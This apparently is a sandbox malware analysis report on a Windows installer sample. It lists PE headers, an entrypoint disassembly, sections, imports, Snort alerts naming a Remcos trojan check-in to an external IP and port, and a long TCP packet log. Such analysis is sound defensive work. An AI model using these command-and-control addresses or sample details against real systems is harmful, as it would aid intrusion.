                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      xor ebx, ebx
                                                      push edi
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 00409130h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [00407034h]
                                                      push 00008001h
                                                      call dword ptr [004070B4h]
                                                      push ebx
                                                      call dword ptr [0040728Ch]
                                                      push 00000008h
                                                      mov dword ptr [00423798h], eax
                                                      call 00007EFCC0C7E672h
                                                      mov dword ptr [004236E4h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041ECA0h
                                                      call dword ptr [00407164h]
                                                      push 004091E4h
                                                      push 00422EE0h
                                                      call 00007EFCC0C7E31Ch
                                                      call dword ptr [004070B0h]
                                                      mov ebp, 00429000h
                                                      push eax
                                                      push ebp
                                                      call 00007EFCC0C7E30Ah
                                                      push ebx
                                                      call dword ptr [00407118h]
                                                      cmp byte ptr [00429000h], 00000022h
                                                      mov dword ptr [004236E0h], eax
                                                      mov eax, ebp
                                                      jne 00007EFCC0C7B8CCh
                                                      mov byte ptr [esp+14h], 00000022h
                                                      mov eax, 00429001h
                                                      push dword ptr [esp+14h]
                                                      push eax
                                                      call 00007EFCC0C7DD9Ah
                                                      push eax
                                                      call dword ptr [00407220h]
                                                      mov dword ptr [esp+1Ch], eax
                                                      jmp 00007EFCC0C7B985h
                                                      cmp cl, 00000020h
                                                      jne 00007EFCC0C7B8C8h
                                                      inc eax
                                                      cmp byte ptr [eax], 00000020h
                                                      je 00007EFCC0C7B8BCh

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x320000x33488.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x5be20x5c009dfc1bc55ef90dfdde51b4a47a602ee6False0.669921875data6.48151554579659IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x90000x1a7d80x400f1bf988467c2a1fe94575f6d3e66d158False0.603515625data4.930453335376689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x240000xe0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x320000x334880x33600fe27f5d985ec8eb1c83e8de71cfb6fcfFalse0.4165241027980535data4.793269294154927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x324480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2289128120194014
                                                      RT_ICON0x42c700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3004256884591129
                                                      RT_ICON0x4c1180x8b09PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9878908774197174
                                                      RT_ICON0x54c280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3189463955637708
                                                      RT_ICON0x5a0b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3108762399622107
                                                      RT_ICON0x5e2d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.37178423236514524
                                                      RT_ICON0x608800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4214352720450281
                                                      RT_ICON0x619280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5298507462686567
                                                      RT_ICON0x627d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5008196721311475
                                                      RT_ICON0x631580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5469314079422383
                                                      RT_ICON0x63a000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5184331797235023
                                                      RT_ICON0x640c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.43352601156069365
                                                      RT_ICON0x646300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5585106382978723
                                                      RT_DIALOG0x64a980x100dataEnglishUnited States0.5234375
                                                      RT_DIALOG0x64b980x11cdataEnglishUnited States0.6056338028169014
                                                      RT_DIALOG0x64cb80xc4dataEnglishUnited States0.5918367346938775
                                                      RT_DIALOG0x64d800x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0x64de00xbcdataEnglishUnited States0.648936170212766
                                                      RT_VERSION0x64ea00x2dcdataEnglishUnited States0.47404371584699456
                                                      RT_MANIFEST0x651800x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                      USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                      ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                      ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      04/26/24-07:44:24.601980TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin4970829871192.168.2.6193.222.96.21
                                                      04/26/24-07:44:24.894704TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response2987149708193.222.96.21192.168.2.6

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 26, 2024 07:44:21.031219006 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.031259060 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.031449080 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.042454958 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.042469978 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.305634022 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.305830002 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.355596066 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.355644941 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.356511116 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.357466936 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.361473083 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.408118010 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598200083 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598254919 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598315001 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598315001 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598328114 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598351955 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598364115 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598371983 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598406076 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598406076 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598599911 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598645926 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598690033 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598751068 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598763943 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598826885 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598838091 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598898888 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.598908901 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.598956108 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.599358082 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.599423885 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.599471092 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.599517107 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.599526882 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.599582911 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.599594116 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.599657059 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.600167036 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.600229025 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.600239992 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.600300074 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.600310087 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.600394011 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.600452900 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.600466013 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.600532055 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.600984097 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.601036072 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.601047039 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.601217985 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.601269960 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.601280928 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.601450920 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.601898909 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.601965904 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.601975918 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.602032900 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.602037907 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.602050066 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.602119923 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.602147102 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.602209091 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.602799892 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.602864981 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.602894068 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.603054047 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.603106022 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.603108883 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.603120089 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.603163958 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604217052 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604268074 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604279041 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604337931 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604347944 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604418039 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604429007 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604495049 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604556084 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604612112 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604623079 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604679108 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604695082 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604834080 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604882956 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.604895115 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.604947090 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.605689049 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.605761051 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.723579884 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.723674059 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.723700047 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.723841906 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.724041939 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.724097967 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.724419117 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.724482059 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.724692106 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.724757910 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.724936962 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.724998951 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.725747108 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.725805998 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.726603985 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.726666927 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.727045059 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.727108002 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.727170944 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.727226019 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.728705883 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.728773117 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.729144096 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.729212046 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.729813099 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.729880095 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.730186939 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.730258942 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.730464935 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.730524063 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.730798006 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.730861902 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.731551886 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.731616974 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.731734037 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.731795073 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.847748041 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.847846985 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.848288059 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.848375082 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.848627090 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.848701954 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.848949909 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.849029064 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.849267960 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.849347115 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.849956036 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.850030899 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.850707054 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.850790977 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.850860119 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.850944996 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.851649046 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.851722002 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.852694035 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.852767944 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.852895021 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.852972984 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.853483915 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.853558064 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.854226112 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.854299068 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.854422092 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.854495049 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.855046034 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.855122089 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.855823994 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.855894089 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.855912924 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.855973959 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.856769085 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.856844902 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.857619047 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.857693911 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.857795954 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.857870102 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.858567953 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.858638048 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.860471010 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.860491991 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.860532045 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.860552073 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.860590935 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.860625982 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.860625982 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.860642910 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.861018896 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.862104893 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.862168074 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.862193108 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.862205029 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.862234116 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.862255096 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.864593983 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.864644051 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.864674091 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.864685059 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.864712954 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.864794016 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.866482019 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.866566896 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.866585970 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.866676092 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.869024038 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.869079113 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.869119883 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.869132996 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.869164944 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.869184971 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.870801926 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.870887041 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.870902061 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.870961905 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.873542070 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.873583078 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.873620987 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.873637915 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.873661995 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.873682022 CEST49707443192.168.2.6172.67.191.112
                                                      Apr 26, 2024 07:44:21.875365973 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.875410080 CEST44349707172.67.191.112192.168.2.6
                                                      Apr 26, 2024 07:44:21.875442028 CEST49707443192.168.2.6172.67.191.112
